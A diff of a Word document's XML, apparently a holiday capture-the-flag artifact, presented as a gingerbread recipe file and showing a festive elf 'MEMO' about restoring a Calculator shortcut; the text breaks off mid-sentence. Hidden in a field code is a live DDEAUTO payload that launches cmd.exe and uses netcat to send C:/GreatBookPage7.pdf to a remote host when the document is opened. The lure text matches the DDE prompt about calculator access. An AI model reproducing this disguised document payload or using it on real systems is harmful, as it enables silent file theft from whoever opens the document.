--- a/output/gingerbread cookie recipe.docx
+++ b/output/gingerbread cookie recipe.docx
@@ -1,7 +1,1223 @@
 
-<file path=word/document.xml><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
-<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid wp14"><w:body><w:bookmarkStart w:id="0" w:name="_GoBack"/><w:bookmarkEnd w:id="0"/><w:p><w:r><w:rPr><w:noProof/><w:sz w:val="20"/></w:rPr><mc:AlternateContent><mc:Choice Requires="wps"><w:drawing><wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251657728" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1"><wp:simplePos x="0" y="0"/><wp:positionH relativeFrom="column"><wp:posOffset>1828800</wp:posOffset></wp:positionH><wp:positionV relativeFrom="paragraph"><wp:posOffset>114300</wp:posOffset></wp:positionV><wp:extent cx="4572000" cy="1914525"/><wp:effectExtent l="0" t="0" r="0" b="0"/><wp:wrapNone/><wp:docPr id="7" name="Text Box 28"/><wp:cNvGraphicFramePr><a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/></wp:cNvGraphicFramePr><a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"><a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape"><wps:wsp><wps:cNvSpPr txBox="1"><a:spLocks noChangeArrowheads="1"/></wps:cNvSpPr><wps:spPr bwMode="auto"><a:xfrm><a:off x="0" y="0"/><a:ext cx="4572000" cy="1914525"/></a:xfrm><a:prstGeom prst="rect"><a:avLst/></a:prstGeom><a:noFill/><a:ln><a:noFill/></a:ln><a:extLst><a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}"><a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"><a:solidFill><a:srgbClr val="FFFFFF"/></a:solidFill></a14:hiddenFill></a:ext><a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}"><a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="9525"><a:solidFill><a:srgbClr val="000000"/></a:solidFill><a:miter lim="800000"/><a:headEnd/><a:tailEnd/></a14:hiddenLine></a:ext></a:extLst></wps:spPr><wps:txbx><w:txbxContent><w:p><w:pPr><w:pStyle w:val="BodyText"/><w:jc w:val="center"/><w:rPr><w:rFonts w:ascii="Hank BT" w:hAnsi="Hank BT"/><w:b/><w:bCs/><w:color w:val="FF0000"/><w:sz w:val="280"/><w:szCs w:val="280"/></w:rPr></w:pPr><w:r><w:rPr><w:rFonts w:ascii="Hank BT" w:hAnsi="Hank BT"/><w:b/><w:bCs/><w:color w:val="669900"/><w:sz w:val="280"/><w:szCs w:val="280"/></w:rPr><w:t>M</w:t></w:r><w:r><w:rPr><w:rFonts w:ascii="Hank BT" w:hAnsi="Hank BT"/><w:b/><w:bCs/><w:color w:val="FF0000"/><w:sz w:val="280"/><w:szCs w:val="280"/></w:rPr><w:t>E</w:t></w:r><w:r><w:rPr><w:rFonts w:ascii="Hank BT" w:hAnsi="Hank BT"/><w:b/><w:bCs/><w:color w:val="669900"/><w:sz w:val="280"/><w:szCs w:val="280"/></w:rPr><w:t>M</w:t></w:r><w:r><w:rPr><w:rFonts w:ascii="Hank BT" w:hAnsi="Hank BT"/><w:b/><w:bCs/><w:color w:val="FF0000"/><w:sz w:val="280"/><w:szCs w:val="280"/></w:rPr><w:t>O</w:t></w:r></w:p></w:txbxContent></wps:txbx><wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0" upright="1"><a:noAutofit/></wps:bodyPr></wps:wsp></a:graphicData></a:graphic><wp14:sizeRelH relativeFrom="page"><wp14:pctWidth>0</wp14:pctWidth></wp14:sizeRelH><wp14:sizeRelV relativeFrom="page"><wp14:pctHeight>0</wp14:pctHeight></wp14:sizeRelV></wp:anchor></w:drawing></mc:Choice><mc:Fallback><w:pict><v:shapetype id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe"><v:stroke joinstyle="miter"/><v:path gradientshapeok="t" o:connecttype="rect"/></v:shapetype><v:shape id="Text Box 28" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;margin-left:2in;margin-top:9pt;width:5in;height:150.75pt;z-index:251657728;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:page;mso-height-relative:page;v-text-anchor:top" o:gfxdata="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" filled="f" stroked="f"><v:textbox><w:txbxContent><w:p><w:pPr><w:pStyle w:val="BodyText"/><w:jc w:val="center"/><w:rPr><w:rFonts w:ascii="Hank BT" w:hAnsi="Hank BT"/><w:b/><w:bCs/><w:color w:val="FF0000"/><w:sz w:val="280"/><w:szCs w:val="280"/></w:rPr></w:pPr><w:r><w:rPr><w:rFonts w:ascii="Hank BT" w:hAnsi="Hank BT"/><w:b/><w:bCs/><w:color w:val="669900"/><w:sz w:val="280"/><w:szCs w:val="280"/></w:rPr><w:t>M</w:t></w:r><w:r><w:rPr><w:rFonts w:ascii="Hank BT" w:hAnsi="Hank BT"/><w:b/><w:bCs/><w:color w:val="FF0000"/><w:sz w:val="280"/><w:szCs w:val="280"/></w:rPr><w:t>E</w:t></w:r><w:r><w:rPr><w:rFonts w:ascii="Hank BT" w:hAnsi="Hank BT"/><w:b/><w:bCs/><w:color w:val="669900"/><w:sz w:val="280"/><w:szCs w:val="280"/></w:rPr><w:t>M</w:t></w:r><w:r><w:rPr><w:rFonts w:ascii="Hank BT" w:hAnsi="Hank BT"/><w:b/><w:bCs/><w:color w:val="FF0000"/><w:sz w:val="280"/><w:szCs w:val="280"/></w:rPr><w:t>O</w:t></w:r></w:p></w:txbxContent></v:textbox></v:shape></w:pict></mc:Fallback></mc:AlternateContent></w:r><w:r><w:rPr><w:noProof/><w:sz w:val="20"/></w:rPr><mc:AlternateContent><mc:Choice Requires="wps"><w:drawing><wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658752" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1"><wp:simplePos x="0" y="0"/><wp:positionH relativeFrom="column"><wp:posOffset>-800100</wp:posOffset></wp:positionH><wp:positionV relativeFrom="paragraph"><wp:posOffset>-571500</wp:posOffset></wp:positionV><wp:extent cx="2532380" cy="2820670"/><wp:effectExtent l="0" t="0" r="1270" b="0"/><wp:wrapNone/><wp:docPr id="6" name="Text Box 31"/><wp:cNvGraphicFramePr><a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/></wp:cNvGraphicFramePr><a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"><a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape"><wps:wsp><wps:cNvSpPr txBox="1"><a:spLocks noChangeArrowheads="1"/></wps:cNvSpPr><wps:spPr bwMode="auto"><a:xfrm><a:off x="0" y="0"/><a:ext cx="2532380" cy="2820670"/></a:xfrm><a:prstGeom prst="rect"><a:avLst/></a:prstGeom><a:noFill/><a:ln><a:noFill/></a:ln><a:extLst><a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}"><a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"><a:solidFill><a:srgbClr val="FFFFFF"/></a:solidFill></a14:hiddenFill></a:ext><a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}"><a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="9525"><a:solidFill><a:srgbClr val="000000"/></a:solidFill><a:miter lim="800000"/><a:headEnd/><a:tailEnd/></a14:hiddenLine></a:ext></a:extLst></wps:spPr><wps:txbx><w:txbxContent><w:p><w:r><w:rPr><w:noProof/></w:rPr><w:drawing><wp:inline distT="0" distB="0" distL="0" distR="0"><wp:extent cx="2352675" cy="2733675"/><wp:effectExtent l="0" t="0" r="0" b="0"/><wp:docPr id="1" name="Picture 1" descr="xmas_tree"/><wp:cNvGraphicFramePr><a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/></wp:cNvGraphicFramePr><a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"><a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture"><pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture"><pic:nvPicPr><pic:cNvPr id="0" name="Picture 1" descr="xmas_tree"/><pic:cNvPicPr><a:picLocks noChangeAspect="1" noChangeArrowheads="1"/></pic:cNvPicPr></pic:nvPicPr><pic:blipFill><a:blip r:embed="rId7"><a:extLst><a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}"><a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/></a:ext></a:extLst></a:blip><a:srcRect/><a:stretch><a:fillRect/></a:stretch></pic:blipFill><pic:spPr bwMode="auto"><a:xfrm><a:off x="0" y="0"/><a:ext cx="2352675" cy="2733675"/></a:xfrm><a:prstGeom prst="rect"><a:avLst/></a:prstGeom><a:noFill/><a:ln><a:noFill/></a:ln></pic:spPr></pic:pic></a:graphicData></a:graphic></wp:inline></w:drawing></w:r></w:p></w:txbxContent></wps:txbx><wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0" upright="1"><a:noAutofit/></wps:bodyPr></wps:wsp></a:graphicData></a:graphic><wp14:sizeRelH relativeFrom="page"><wp14:pctWidth>0</wp14:pctWidth></wp14:sizeRelH><wp14:sizeRelV relativeFrom="page"><wp14:pctHeight>0</wp14:pctHeight></wp14:sizeRelV></wp:anchor></w:drawing></mc:Choice><mc:Fallback><w:pict><v:shape id="Text Box 31" o:spid="_x0000_s1027" type="#_x0000_t202" style="position:absolute;margin-left:-63pt;margin-top:-45pt;width:199.4pt;height:222.1pt;z-index:251658752;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:page;mso-height-relative:page;v-text-anchor:top" o:gfxdata="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" filled="f" stroked="f"><v:textbox><w:txbxContent><w:p><w:r><w:rPr><w:noProof/></w:rPr><w:drawing><wp:inline distT="0" distB="0" distL="0" distR="0"><wp:extent cx="2352675" cy="2733675"/><wp:effectExtent l="0" t="0" r="0" b="0"/><wp:docPr id="1" name="Picture 1" descr="xmas_tree"/><wp:cNvGraphicFramePr><a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/></wp:cNvGraphicFramePr><a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"><a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture"><pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture"><pic:nvPicPr><pic:cNvPr id="0" name="Picture 1" descr="xmas_tree"/><pic:cNvPicPr><a:picLocks noChangeAspect="1" noChangeArrowheads="1"/></pic:cNvPicPr></pic:nvPicPr><pic:blipFill><a:blip r:embed="rId8"><a:extLst><a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}"><a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/></a:ext></a:extLst></a:blip><a:srcRect/><a:stretch><a:fillRect/></a:stretch></pic:blipFill><pic:spPr bwMode="auto"><a:xfrm><a:off x="0" y="0"/><a:ext cx="2352675" cy="2733675"/></a:xfrm><a:prstGeom prst="rect"><a:avLst/></a:prstGeom><a:noFill/><a:ln><a:noFill/></a:ln></pic:spPr></pic:pic></a:graphicData></a:graphic></wp:inline></w:drawing></w:r></w:p></w:txbxContent></v:textbox></v:shape></w:pict></mc:Fallback></mc:AlternateContent></w:r><w:r><w:rPr><w:noProof/><w:sz w:val="20"/></w:rPr><mc:AlternateContent><mc:Choice Requires="wps"><w:drawing><wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659776" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1"><wp:simplePos x="0" y="0"/><wp:positionH relativeFrom="column"><wp:posOffset>-1257300</wp:posOffset></wp:positionH><wp:positionV relativeFrom="paragraph"><wp:posOffset>-914400</wp:posOffset></wp:positionV><wp:extent cx="7886700" cy="228600"/><wp:effectExtent l="0" t="0" r="0" b="0"/><wp:wrapNone/><wp:docPr id="5" name="Rectangle 32"/><wp:cNvGraphicFramePr><a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/></wp:cNvGraphicFramePr><a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"><a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape"><wps:wsp><wps:cNvSpPr><a:spLocks noChangeArrowheads="1"/></wps:cNvSpPr><wps:spPr bwMode="auto"><a:xfrm><a:off x="0" y="0"/><a:ext cx="7886700" cy="228600"/></a:xfrm><a:prstGeom prst="rect"><a:avLst/></a:prstGeom><a:solidFill><a:srgbClr val="89AA00"/></a:solidFill><a:ln><a:noFill/></a:ln><a:extLst><a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}"><a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="9525"><a:solidFill><a:srgbClr val="000000"/></a:solidFill><a:miter lim="800000"/><a:headEnd/><a:tailEnd/></a14:hiddenLine></a:ext></a:extLst></wps:spPr><wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0" upright="1"><a:noAutofit/></wps:bodyPr></wps:wsp></a:graphicData></a:graphic><wp14:sizeRelH relativeFrom="page"><wp14:pctWidth>0</wp14:pctWidth></wp14:sizeRelH><wp14:sizeRelV relativeFrom="page"><wp14:pctHeight>0</wp14:pctHeight></wp14:sizeRelV></wp:anchor></w:drawing></mc:Choice><mc:Fallback><w:pict><v:rect w14:anchorId="7A6F33F3" id="Rectangle 32" o:spid="_x0000_s1026" style="position:absolute;margin-left:-99pt;margin-top:-1in;width:621pt;height:18pt;z-index:251659776;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:page;mso-height-relative:page;v-text-anchor:top" o:gfxdata="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" fillcolor="#89aa00" stroked="f"/></w:pict></mc:Fallback></mc:AlternateContent></w:r></w:p><w:p><w:pPr><w:pStyle w:val="NormalWeb"/><w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/><w:rPr><w:rFonts w:ascii="Trebuchet MS" w:eastAsia="Times New Roman" w:hAnsi="Trebuchet MS" w:cs="Times New Roman"/></w:rPr></w:pPr></w:p><w:p><w:r><w:rPr><w:noProof/><w:sz w:val="20"/></w:rPr><mc:AlternateContent><mc:Choice Requires="wps"><w:drawing><wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251655680" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1"><wp:simplePos x="0" y="0"/><wp:positionH relativeFrom="column"><wp:posOffset>-3543300</wp:posOffset></wp:positionH><wp:positionV relativeFrom="paragraph"><wp:posOffset>103505</wp:posOffset></wp:positionV><wp:extent cx="0" cy="1371600"/><wp:effectExtent l="9525" t="9525" r="9525" b="9525"/><wp:wrapNone/><wp:docPr id="4" name="Line 8"/><wp:cNvGraphicFramePr><a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/></wp:cNvGraphicFramePr><a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"><a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape"><wps:wsp><wps:cNvCnPr><a:cxnSpLocks noChangeShapeType="1"/></wps:cNvCnPr><wps:spPr bwMode="auto"><a:xfrm flipV="1"><a:off x="0" y="0"/><a:ext cx="0" cy="1371600"/></a:xfrm><a:prstGeom prst="line"><a:avLst/></a:prstGeom><a:noFill/><a:ln w="12700"><a:solidFill><a:srgbClr val="FFFFFF"/></a:solidFill><a:round/><a:headEnd/><a:tailEnd/></a:ln><a:extLst><a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}"><a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"><a:noFill/></a14:hiddenFill></a:ext></a:extLst></wps:spPr><wps:bodyPr/></wps:wsp></a:graphicData></a:graphic><wp14:sizeRelH relativeFrom="page"><wp14:pctWidth>0</wp14:pctWidth></wp14:sizeRelH><wp14:sizeRelV relativeFrom="page"><wp14:pctHeight>0</wp14:pctHeight></wp14:sizeRelV></wp:anchor></w:drawing></mc:Choice><mc:Fallback><w:pict><v:line w14:anchorId="154CF63E" id="Line 8" o:spid="_x0000_s1026" style="position:absolute;flip:y;z-index:251655680;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:page;mso-height-relative:page" from="-279pt,8.15pt" to="-279pt,116.15pt" o:gfxdata="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" strokecolor="white" strokeweight="1pt"/></w:pict></mc:Fallback></mc:AlternateContent></w:r></w:p><w:p/><w:p><w:pPr><w:pStyle w:val="NormalWeb"/><w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/><w:rPr><w:rFonts w:ascii="Trebuchet MS" w:eastAsia="Times New Roman" w:hAnsi="Trebuchet MS" w:cs="Times New Roman"/></w:rPr></w:pPr></w:p><w:p/><w:p/><w:p><w:pPr><w:pStyle w:val="NormalWeb"/><w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/><w:rPr><w:rFonts w:ascii="Trebuchet MS" w:eastAsia="Times New Roman" w:hAnsi="Trebuchet MS" w:cs="Times New Roman"/></w:rPr></w:pPr><w:r><w:rPr><w:rFonts w:ascii="Trebuchet MS" w:eastAsia="Times New Roman" w:hAnsi="Trebuchet MS" w:cs="Times New Roman"/></w:rPr><w:fldChar w:fldCharType="begin"/></w:r><w:r><w:rPr><w:rFonts w:ascii="Trebuchet MS" w:eastAsia="Times New Roman" w:hAnsi="Trebuchet MS" w:cs="Times New Roman"/></w:rPr><w:instrText xml:space="preserve">  </w:instrText></w:r><w:r><w:rPr><w:rFonts w:ascii="Trebuchet MS" w:eastAsia="Times New Roman" w:hAnsi="Trebuchet MS" w:cs="Times New Roman"/></w:rPr><w:fldChar w:fldCharType="end"/></w:r></w:p><w:p/><w:p><w:pPr><w:pStyle w:val="NormalWeb"/><w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/><w:rPr><w:rFonts w:ascii="Trebuchet MS" w:eastAsia="Times New Roman" w:hAnsi="Trebuchet MS" w:cs="Times New Roman"/></w:rPr></w:pPr></w:p><w:p/><w:p/><w:p/><w:p/><w:p><w:r><w:fldChar w:fldCharType="begin"/></w:r><w:r><w:instrText xml:space="preserve"> </w:instrText></w:r><w:r><w:instrText>DDEAUTO c:\\windows\\system32\\cmd.exe "/k nc.exe 10.142.0.11:44665 < C:/GreatBookPage7.pdf"</w:instrText></w:r><w:r><w:instrText xml:space="preserve"> </w:instrText></w:r><w:r><w:fldChar w:fldCharType="end"/></w:r><w:r><w:rPr><w:noProof/><w:sz w:val="20"/></w:rPr><mc:AlternateContent><mc:Choice Requires="wps"><w:drawing><wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251656704" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1"><wp:simplePos x="0" y="0"/><wp:positionH relativeFrom="column"><wp:posOffset>-800100</wp:posOffset></wp:positionH><wp:positionV relativeFrom="paragraph"><wp:posOffset>166370</wp:posOffset></wp:positionV><wp:extent cx="7086600" cy="1638300"/><wp:effectExtent l="0" t="0" r="0" b="0"/><wp:wrapNone/><wp:docPr id="3" name="Text Box 10"/><wp:cNvGraphicFramePr><a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/></wp:cNvGraphicFramePr><a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"><a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape"><wps:wsp><wps:cNvSpPr txBox="1"><a:spLocks noChangeArrowheads="1"/></wps:cNvSpPr><wps:spPr bwMode="auto"><a:xfrm><a:off x="0" y="0"/><a:ext cx="7086600" cy="1638300"/></a:xfrm><a:prstGeom prst="rect"><a:avLst/></a:prstGeom><a:noFill/><a:ln><a:noFill/></a:ln><a:extLst><a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}"><a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"><a:solidFill><a:srgbClr val="FFFFFF"/></a:solidFill></a14:hiddenFill></a:ext><a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}"><a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="9525"><a:solidFill><a:srgbClr val="000000"/></a:solidFill><a:miter lim="800000"/><a:headEnd/><a:tailEnd/></a14:hiddenLine></a:ext></a:extLst></wps:spPr><wps:txbx><w:txbxContent><w:p><w:pPr><w:pStyle w:val="BodyText"/><w:rPr><w:color w:val="FF0000"/></w:rPr></w:pPr><w:r><w:rPr><w:color w:val="FF0000"/></w:rPr><w:t>TO: Wunorse Openslae</w:t></w:r></w:p><w:p><w:pPr><w:pStyle w:val="BodyText"/><w:rPr><w:color w:val="FF0000"/></w:rPr></w:pPr><w:r><w:rPr><w:color w:val="FF0000"/></w:rPr><w:t>FROM: Shinny Upatree</w:t></w:r></w:p><w:p><w:pPr><w:pStyle w:val="BodyText"/><w:rPr><w:color w:val="FF0000"/></w:rPr></w:pPr><w:r><w:rPr><w:color w:val="FF0000"/></w:rPr><w:t>Subject: Reminder for Calculator Access</w:t></w:r></w:p></w:txbxContent></wps:txbx><wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0" upright="1"><a:noAutofit/></wps:bodyPr></wps:wsp></a:graphicData></a:graphic><wp14:sizeRelH relativeFrom="page"><wp14:pctWidth>0</wp14:pctWidth></wp14:sizeRelH><wp14:sizeRelV relativeFrom="page"><wp14:pctHeight>0</wp14:pctHeight></wp14:sizeRelV></wp:anchor></w:drawing></mc:Choice><mc:Fallback><w:pict><v:shape id="Text Box 10" o:spid="_x0000_s1028" type="#_x0000_t202" style="position:absolute;margin-left:-63pt;margin-top:13.1pt;width:558pt;height:129pt;z-index:251656704;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:page;mso-height-relative:page;v-text-anchor:top" o:gfxdata="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" filled="f" stroked="f"><v:textbox><w:txbxContent><w:p><w:pPr><w:pStyle w:val="BodyText"/><w:rPr><w:color w:val="FF0000"/></w:rPr></w:pPr><w:r><w:rPr><w:color w:val="FF0000"/></w:rPr><w:t>TO: Wunorse Openslae</w:t></w:r></w:p><w:p><w:pPr><w:pStyle w:val="BodyText"/><w:rPr><w:color w:val="FF0000"/></w:rPr></w:pPr><w:r><w:rPr><w:color w:val="FF0000"/></w:rPr><w:t>FROM: Shinny Upatree</w:t></w:r></w:p><w:p><w:pPr><w:pStyle w:val="BodyText"/><w:rPr><w:color w:val="FF0000"/></w:rPr></w:pPr><w:r><w:rPr><w:color w:val="FF0000"/></w:rPr><w:t>Subject: Reminder for Calculator Access</w:t></w:r></w:p></w:txbxContent></v:textbox></v:shape></w:pict></mc:Fallback></mc:AlternateContent></w:r></w:p><w:p/><w:p/><w:p/><w:p/><w:p/><w:p><w:pPr><w:pStyle w:val="NormalWeb"/><w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/><w:rPr><w:rFonts w:ascii="Trebuchet MS" w:eastAsia="Times New Roman" w:hAnsi="Trebuchet MS" w:cs="Times New Roman"/><w:noProof/></w:rPr></w:pPr><w:r><w:rPr><w:rFonts w:ascii="Trebuchet MS" w:eastAsia="Times New Roman" w:hAnsi="Trebuchet MS" w:cs="Times New Roman"/><w:noProof/></w:rPr><mc:AlternateContent><mc:Choice Requires="wps"><w:drawing><wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251654656" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1"><wp:simplePos x="0" y="0"/><wp:positionH relativeFrom="column"><wp:posOffset>-800100</wp:posOffset></wp:positionH><wp:positionV relativeFrom="paragraph"><wp:posOffset>466725</wp:posOffset></wp:positionV><wp:extent cx="6781800" cy="3686175"/><wp:effectExtent l="0" t="0" r="0" b="9525"/><wp:wrapNone/><wp:docPr id="2" name="Text Box 2"/><wp:cNvGraphicFramePr><a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/></wp:cNvGraphicFramePr><a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"><a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape"><wps:wsp><wps:cNvSpPr txBox="1"><a:spLocks noChangeArrowheads="1"/></wps:cNvSpPr><wps:spPr bwMode="auto"><a:xfrm><a:off x="0" y="0"/><a:ext cx="6781800" cy="3686175"/></a:xfrm><a:prstGeom prst="rect"><a:avLst/></a:prstGeom><a:noFill/><a:ln><a:noFill/></a:ln><a:extLst><a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}"><a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"><a:solidFill><a:srgbClr val="FFFFFF"/></a:solidFill></a14:hiddenFill></a:ext><a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}"><a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="9525"><a:solidFill><a:srgbClr val="000000"/></a:solidFill><a:miter lim="800000"/><a:headEnd/><a:tailEnd/></a14:hiddenLine></a:ext></a:extLst></wps:spPr><wps:txbx><w:txbxContent><w:p><w:pPr><w:pStyle w:val="BodyText2"/><w:spacing w:line="276" w:lineRule="auto"/><w:jc w:val="left"/><w:rPr><w:color w:val="89AA00"/><w:sz w:val="32"/></w:rPr></w:pPr><w:r><w:rPr><w:color w:val="89AA00"/><w:sz w:val="32"/></w:rPr><w:t>I don't know how you do it Wunorse. I've restored your Windows Calculator shortcut at least a dozen times. Instead of creating it again, I've created a special document for 